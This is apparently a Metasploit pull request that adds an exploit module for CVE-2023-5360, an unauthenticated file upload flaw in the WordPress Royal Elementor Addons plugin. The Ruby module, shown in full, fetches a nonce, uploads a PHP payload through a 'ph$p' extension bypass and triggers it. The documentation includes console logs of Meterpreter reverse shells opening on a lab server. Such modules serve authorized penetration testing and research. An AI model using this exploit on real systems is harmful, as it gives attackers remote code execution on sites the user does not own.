### PR TITLE
Add Exploit Module for WP Royal Elementor Addons Unauthenticated File Upload (CVE-2023-5360)

### DIFF
--- a/data/wordlists/wp-exploitable-plugins.txt
+++ b/data/wordlists/wp-exploitable-plugins.txt
@@ -59,3 +59,4 @@ bookingpress
 paid-memberships-pro
 woocommerce-payments
 file-manager-advanced-shortcode
+royal-elementor-addons

--- a/documentation/modules/exploit/multi/http/wp_royal_elementor_addons_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_royal_elementor_addons_rce.md
@@ -23,25 +23,25 @@ To replicate a vulnerable environment for testing:
 
 This module offers several options:
 
-#### RHOSTS
+### RHOSTS
 
 - **Description**: Target address or range of addresses.
 - **Required**: Yes.
 - **Default Value**: None (user must specify).
 
-#### RPORT
+### RPORT
 
 - **Description**: Target port (TCP) for the WordPress application.
 - **Required**: Yes.
 - **Default Value**: 443.
 
-#### SSL
+### SSL
 
 - **Description**: Determines if SSL/TLS should be used.
 - **Required**: Yes.
 - **Default Value**: True.
 
-#### TARGETURI
+### TARGETURI
 
 - **Description**: Base path of the WordPress application.
 - **Required**: Yes.

--- a/documentation/modules/exploit/multi/http/wp_royal_elementor_addons_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_royal_elementor_addons_rce.md
@@ -1,0 +1,77 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution vulnerability in WordPress Royal Elementor Addons and Templates
+plugin, versions prior to 1.3.79.
+The vulnerability is due to an unauthenticated file upload flaw in the plugin.
+To replicate a vulnerable environment for testing:
+
+1. Install WordPress.
+2. Download and install the Royal Elementor Addons and Templates plugin, ensuring the version is below 1.3.79.
+3. Verify that the plugin is activated and accessible on the local network.
+
+## Verification Steps
+
+1. Set up a WordPress instance with the Royal Elementor Addons plugin (version < 1.3.79).
+2. Launch `msfconsole` in your Metasploit framework.
+3. Use the module: `use exploit/multi/http/wp_royal_elementor_addons_rce`.
+4. Set `RHOSTS` to the local IP address or hostname of the target.
+5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload.
+
+## Options
+
+This module offers several options:
+
+#### RHOSTS
+
+- **Description**: Target address or range of addresses.
+- **Required**: Yes.
+- **Default Value**: None (user must specify).
+
+#### RPORT
+
+- **Description**: Target port (TCP) for the WordPress application.
+- **Required**: Yes.
+- **Default Value**: 443.
+
+#### SSL
+
+- **Description**: Determines if SSL/TLS should be used.
+- **Required**: Yes.
+- **Default Value**: True.
+
+#### TARGETURI
+
+- **Description**: Base path of the WordPress application.
+- **Required**: Yes.
+- **Default Value**: `/`.
+
+## Scenarios
+
+### Successful Exploitation Against Local WordPress with Royal Elementor Addons 1.3.78
+
+**Setup**:
+
+- Local WordPress instance with Royal Elementor Addons version 1.3.78.
+- Metasploit Framework.
+
+**Steps**:
+
+1. Start `msfconsole`.
+2. Load the module:
+```
+use exploit/multi/http/wp_royal_elementor_addons_rce
+```
+4. Set `RHOSTS` to the local IP (e.g., 192.168.1.10).
+5. Configure other necessary options (TARGETURI, SSL, etc.).
+6. Launch the exploit:
+```
+exploit
+```
+
+**Expected Results**:
+
+- The module attempts to retrieve a nonce from the local server.
+- It then uploads and executes the payload.
+- If successful, control over the local WordPress instance is gained, depending on the payload used.

--- a/documentation/modules/exploit/multi/http/wp_royal_elementor_addons_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_royal_elementor_addons_rce.md
@@ -7,7 +7,8 @@ To replicate a vulnerable environment for testing:
 
 1. Install WordPress.
 2. Download and install the Royal Elementor Addons and Templates plugin, ensuring the version is below 1.3.79.
-3. Verify that the plugin is activated and accessible on the local network.
+3. Activate Royal Elementor Templates Kit and chose a theme.
+4. Verify that the plugin is activated and accessible on the local network.
 
 ## Verification Steps
 
@@ -22,24 +23,6 @@ To replicate a vulnerable environment for testing:
 ## Options
 
 This module offers several options:
-
-### RHOSTS
-
-- **Description**: Target address or range of addresses.
-- **Required**: Yes.
-- **Default Value**: None (user must specify).
-
-### RPORT
-
-- **Description**: Target port (TCP) for the WordPress application.
-- **Required**: Yes.
-- **Default Value**: 443.
-
-### SSL
-
-- **Description**: Determines if SSL/TLS should be used.
-- **Required**: Yes.
-- **Default Value**: True.
 
 ### TARGETURI
 
@@ -75,3 +58,151 @@ exploit
 - The module attempts to retrieve a nonce from the local server.
 - It then uploads and executes the payload.
 - If successful, control over the local WordPress instance is gained, depending on the payload used.
+
+**Example**:
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```
+msf6 > search royal
+
+Matching Modules
+================
+
+   #  Name                                              Disclosure Date  Rank       Check  Description
+   -  ----                                              ---------------  ----       -----  -----------
+   0  exploit/multi/http/wp_royal_elementor_addons_rce  2023-11-23       excellent  Yes    WordPress Royal Elementor Addons RCE
+
+
+Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_royal_elementor_addons_rce
+
+msf6 > use 0
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > options
+
+Module options (exploit/multi/http/wp_royal_elementor_addons_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
+                                         oit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to the wordpress application
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      VaXEJJxCKI       no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               192.168.1.5      yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set rhosts chocapikk.lab
+rhosts => chocapikk.lab
+msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set rport 8888
+rport => 8888
+msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set ssl false
+[!] Changing the SSL option's value may require changing RPORT!
+ssl => false
+msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.5:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] WordPress Version: 6.4.1
+[+] Detected Royal Elementor Addons version: 1.3.78
+[+] The target appears to be vulnerable.
+[*] Attempting to retrieve nonce...
+[+] Nonce found in response: "9e10e80ee1"
+[*] Sending payload
+[+] Payload uploaded successfully
+[*] Triggering the payload
+[*] Sending stage (3045380 bytes) to 172.20.0.3
+[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.20.0.3:46556) at 2023-11-28 08:27:43 +0100
+
+meterpreter > sysinfo
+Computer     : 172.20.0.3
+OS           : Debian 11.8 (Linux 6.4.10-060410-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+With `php/meterpreter/reverse_tcp`:
+
+```
+msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > options
+
+Module options (exploit/multi/http/wp_royal_elementor_addons_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     chocapikk.lab    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
+                                         oit.html
+   RPORT      8888             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The base path to the wordpress application
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.5      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.5:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] WordPress Version: 6.4.1
+[+] Detected Royal Elementor Addons version: 1.3.78
+[+] The target appears to be vulnerable.
+[*] Attempting to retrieve nonce...
+[+] Nonce found in response: "9e10e80ee1"
+[*] Sending payload
+[+] Payload uploaded successfully
+[*] Triggering the payload
+[*] Sending stage (39927 bytes) to 172.20.0.3
+[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 172.20.0.3:40952) at 2023-11-28 08:30:35 +0100
+
+meterpreter > sysinfo
+Computer    : 541828095fba
+OS          : Linux 541828095fba 6.4.10-060410-generic #202308111154 SMP PREEMPT_DYNAMIC Fri Aug 11 12:00:45 UTC 2023 x86_64
+Meterpreter : php/linux
+meterpreter > getuid
+Server username: www-data
+```

--- a/modules/exploits/multi/http/wp_royal_elementor_addons_rce.rb
+++ b/modules/exploits/multi/http/wp_royal_elementor_addons_rce.rb
@@ -128,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from the target: #{res.code}") if res.code != 200
 
     match = res.body.match(/var\s+WprConfig\s*=\s*({.+?});/)
-    fail_with(Failure::NoTarget, 'Nonce not found in the response.') if match.nil? || match[1].nil?
+    fail_with(Failure::NoTarget, 'Nonce not found in the response. Is Royal Elementor Addons activated AND being used by the WordPress site being targeted?') if match.nil? || match[1].nil?
 
     nonce = JSON.parse(match[1])['nonce']
     fail_with(Failure::NoTarget, 'Parsed a response, but the nonce value is missing') if nonce.nil?

--- a/modules/exploits/multi/http/wp_royal_elementor_addons_rce.rb
+++ b/modules/exploits/multi/http/wp_royal_elementor_addons_rce.rb
@@ -25,6 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'References' => [
           ['CVE', '2023-5360'],
+          ['URL', 'https://vulners.com/nuclei/NUCLEI:CVE-2023-5360'],
           ['WPVDB', '281518ff-7816-4007-b712-63aed7828b34']
         ],
         'Platform' => ['unix', 'linux', 'win', 'php'],

--- a/modules/exploits/multi/http/wp_royal_elementor_addons_rce.rb
+++ b/modules/exploits/multi/http/wp_royal_elementor_addons_rce.rb
@@ -32,6 +32,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'Targets' => [['Automatic', {}]],
         'DisclosureDate' => '2023-11-23',
         'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 443
+        },
         'Privileged' => false,
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -40,12 +44,6 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
   )
-
-    register_options([
-      OptString.new('TARGETURI', [true, 'The base path to the WordPress application', '/']),
-      OptBool.new('SSL', [true, 'Use SSL/TLS connection', true]),
-      Opt::RPORT(443)
-    ])
   end
 
   def check
@@ -56,13 +54,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     check_code = check_plugin_version_from_readme('royal-elementor-addons', '1.3.79')
 
-    if check_code.code == 'appears'
-      plugin_version = check_code.details[:version]
-      print_good("Detected Royal Elementor Addons version: #{plugin_version}")
-      return CheckCode::Appears
+    if check_code.code != 'appears'
+      return CheckCode::Safe
     end
 
-    return CheckCode::Safe
+    plugin_version = check_code.details[:version]
+    print_good("Detected Royal Elementor Addons version: #{plugin_version}")
+    return CheckCode::Appears
   end
 
   def exploit
@@ -74,15 +72,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
     data = {
       'action' => 'wpr_addons_upload_file',
-      'max_file_size' => 0,
+      'max_file_size' => rand(10001),
       'allowed_file_types' => 'ph$p',
       'triggering_event' => 'click',
       'wpr_addons_nonce' => nonce
     }
 
     file_content = '<?php '
-    file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system('#{payload.encoded}');")
-    file_content << ' ?>'
+    file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));")
+    file_content << '?>'
 
     file_name = "#{Rex::Text.rand_text_alphanumeric(8)}.ph$p"
 
@@ -128,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::Unreachable, 'No response received from the target') if res.nil?
     fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from the target: #{res.code}") if res.code != 200
 
-    match = res.body.match(/var\s+WprConfig\s*=\s*({.*?});/)
+    match = res.body.match(/var\s+WprConfig\s*=\s*({.+?});/)
     fail_with(Failure::NoTarget, 'Nonce not found in the response.') if match.nil? || match[1].nil?
 
     nonce = JSON.parse(match[1])['nonce']

--- a/modules/exploits/multi/http/wp_royal_elementor_addons_rce.rb
+++ b/modules/exploits/multi/http/wp_royal_elementor_addons_rce.rb
@@ -1,0 +1,140 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress Royal Elementor Addons RCE',
+        'Description' => %q{
+          Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor Addons and Templates plugin (< 1.3.79).
+        },
+        'Author' => [
+          'Fioravante Souza', # Vulnerability discovery
+          'Valentin Lobstein' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2023-5360'],
+          ['WPVDB', '281518ff-7816-4007-b712-63aed7828b34']
+        ],
+        'Platform' => ['unix', 'linux', 'win', 'php'],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [['Automatic', {}]],
+        'DisclosureDate' => '2023-11-23',
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+  )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base path to the WordPress application', '/']),
+      OptBool.new('SSL', [true, 'Use SSL/TLS connection', true]),
+      Opt::RPORT(443)
+    ])
+  end
+
+  def check
+    return CheckCode::Unknown unless wordpress_and_online?
+
+    wp_version = wordpress_version
+    print_status("WordPress Version: #{wp_version}") if wp_version
+
+    check_code = check_plugin_version_from_readme('royal-elementor-addons', '1.3.79')
+
+    if check_code.code == 'appears'
+      plugin_version = check_code.details[:version]
+      print_good("Detected Royal Elementor Addons version: #{plugin_version}")
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def exploit
+    print_status('Attempting to retrieve nonce...')
+    nonce = retrieve_nonce
+
+    print_status('Sending payload')
+    uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')
+
+    data = {
+      'action' => 'wpr_addons_upload_file',
+      'max_file_size' => 0,
+      'allowed_file_types' => 'ph$p',
+      'triggering_event' => 'click',
+      'wpr_addons_nonce' => nonce
+    }
+
+    file_content = '<?php '
+    file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system('#{payload.encoded}');")
+    file_content << ' ?>'
+
+    file_name = "#{Rex::Text.rand_text_alphanumeric(8)}.ph$p"
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(file_content, 'application/octet-stream', nil, "form-data; name=\"uploaded_file\"; filename=\"#{file_name}\"")
+    data.each_pair do |key, value|
+      post_data.add_part(value.to_s, nil, nil, "form-data; name=\"#{key}\"")
+    end
+
+    res = send_request_cgi({
+      'uri' => uri,
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s
+    })
+
+    unless res
+      fail_with(Failure::Unreachable, 'No response received from the target')
+    end
+
+    if res.code == 200 && res.body.include?('success')
+      print_good('Payload uploaded successfully')
+      response_data = JSON.parse(res.body)
+      if response_data.key?('data') && response_data['data'].key?('url')
+        file_url = response_data['data']['url']
+        print_status('Triggering the payload')
+        send_request_cgi({
+          'uri' => file_url,
+          'method' => 'GET'
+        })
+
+      else
+        fail_with(Failure::UnexpectedReply, 'Payload uploaded but no URL returned in the response')
+      end
+    else
+      fail_with(Failure::UnexpectedReply, 'Failed to upload the payload')
+    end
+  end
+
+  def retrieve_nonce
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'method' => 'GET')
+
+    fail_with(Failure::Unreachable, 'No response received from the target') if res.nil?
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from the target: #{res.code}") if res.code != 200
+
+    match = res.body.match(/var\s+WprConfig\s*=\s*({.*?});/)
+    fail_with(Failure::NoTarget, 'Nonce not found in the response.') if match.nil? || match[1].nil?
+
+    nonce = JSON.parse(match[1])['nonce']
+    fail_with(Failure::NoTarget, 'Parsed a response, but the nonce value is missing') if nonce.nil?
+
+    print_good("Nonce found in response: #{nonce.inspect}")
+    nonce
+  end
+end


### PR DESCRIPTION
## Summary
This pull request introduces a new exploit module for an unauthenticated file upload vulnerability in the WordPress Royal Elementor Addons and Templates plugin (versions before 1.3.79), tracked as CVE-2023-5360. This vulnerability allows for the upload of arbitrary files, leading to potential remote code execution on the affected WordPress site.

## Vulnerability Details
- **CVE ID**: CVE-2023-5360
- This vulnerability arises from insufficient checks on uploaded file types and a lack of proper authentication mechanisms in the plugin. It permits unauthenticated users to upload executable PHP files.

## Module Information
- **Name**: `exploit/multi/http/wp_royal_elementor_addons_rce`
- **Targets**: WordPress Royal Elementor Addons and Templates plugin versions < 1.3.79
- **Tested Against**: Version 1.3.78

## Verification Steps
1. Set up a WordPress instance with the vulnerable version of the plugin.
2. Configure and run the provided Metasploit module against the target.
3. Set the required options in the module (`RHOSTS`, `TARGETURI`, etc.).
4. Execute the exploit.

Successful exploitation will result in the execution of the specified payload on the target WordPress site.

## Documentation Addition
I have included comprehensive documentation alongside the exploit module. This documentation details the usage, setup for a vulnerable environment, and verification steps, ensuring ease of use and understanding for future users of the module.

## Assistance Request
~~I'm encountering an issue where the Meterpreter session goes into the background unexpectedly after exploitation. I am seeking guidance or assistance in resolving this, so the session remains active and accessible immediately post-exploitation.~~

**This happened because I tested on my lab which was exposed online, during DNS resolution there were several IP addresses that's why the looping and backgrounding of meterpreter. So it's an intended behavior**
